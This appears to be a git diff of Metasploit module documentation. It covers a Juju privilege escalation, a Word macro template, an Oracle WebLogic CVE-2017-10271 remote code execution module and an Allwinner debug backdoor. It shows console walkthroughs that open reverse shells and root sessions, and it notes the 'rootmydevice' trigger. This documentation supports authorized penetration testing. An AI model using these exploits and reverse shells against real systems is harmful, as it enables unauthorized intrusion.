+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new root session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc 
+  msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/juju_run_agent_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [*] Trying 3 units...
+  [+] Unit "unit-zabbix-agent-1" uses a privileged socket
+  [*] Writing '/tmp/.tp9oGmPSvx' (207 bytes) ...
+  [*] Sending stage (857352 bytes) to 172.16.191.130
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.130:43760) at 2018-01-13 12:33:48 -0500
+  [+] Deleted /tmp/.tp9oGmPSvx
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.130
+  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
+  Architecture : i686
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```
+

documentation/modules/exploit/multi/fileformat/office_word_macro.md

@@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
 
 ## Options
 
-**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
+**CUSTOMTEMPLATE** 
+
+A docx file that will be used as a template to build the exploit.
 
 ## Trusted Document
 

documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md

@@ -0,0 +1,95 @@
+# Description
+
+This module works leverages [CVE-2017-10271](https://nvd.nist.gov/vuln/detail/CVE-2017-10271) against Oracle WebLogic Server's  Web Service Atomic Transaction API a XML SOAP request to create a `java.lang.ProcessBuilder` object to provide unauthenticated arbitrary command execution.  A command line can be acquired through the use of `cmd/unix/reverse_python`.
+
+Note that the TARGET must be set to match either a Windows or Unix-based host.  If the TARGET variable is set improperly, a log entry will be generated on a vulnerable server, but the server will not crash.  For example, a Linux payload sent to a Windows server will output:
+
+```
+java.io.IOException: Cannot run program "/bin/sh": CreateProcess error=2, The system cannot find the file specified
+Continuing ...
+```
+
+# Vulnerable Application
+
+Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution.
+
+### Windows: Setting up a vulnerable application
+
+We successfully tested this exploit against a fully-patched, Windows 10 (x64) target.  Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM.
+
+1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`).
+2. Run the installer.  (See [here] for detailed instructions.)  You may be prompted to install a Java Development Kit (JDK).  [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working.
+3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it.
+4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192).  Domain names and credentials are irrelevant.  At the conclusion of the wizard, click "Start Admin Server".
+5. The `startWebLogic.cmd` should run immediately after the installer and present logging output.  Once running, the window should output a line similar to the following
+```
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to RUNNING>
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000360> <Server started in RUNNING mode>
+```
+
+### Windows: Attacking a vulnerable application
+
+Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600
+
+Microsoft Windows [Version 10.0.16299.192]
+(c) 2017 Microsoft Corporation. All rights reserved.
+
+C:\Oracle\Middleware\user_projects\domains\admindomain>whoami
+weblogic-server\Administrator
+```
+
+### Unix: Setting up a vulnerable environment
+
+1. If necessary, install Docker.io.  [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM:
+
+```
+apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
+echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list
+apt update
+apt-get install docker-engine
+service docker start
+docker run hello-world
+```
+
+2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0:
+```
+docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271
+```
+
+3. Confirm that the container is up.
+```
+docker ps
+```
+
+### Unix: Attacking a vulnerable application
+
+Attack the above Unix server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of the target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 1
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/unix/reverse_python
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of the attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 5 opened (192.168.108.1:4444 -> 192.168.108.129:51312) at 2018-01-11 11:46:49 -0600
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+# Credits
+Documentation originally written by Aaron Soto (@asoto-r7) and was edited by Kevin Kirsche (@kkirsche).

documentation/modules/exploit/multi/local/allwinner_backdoor.md

@@ -1,10 +1,12 @@
-  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-  Vulnerable OS: all OS images available for Orange Pis,
+## Introduction
+
+Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+Vulnerable OS: all OS images available for Orange Pis,
 				 any for FriendlyARM's NanoPi M1,
 				 SinoVoip's M2+ and M3,
 				 Cuebietech's Cubietruck +
 				 Linksprite's pcDuino8 Uno
-  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
 
 This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.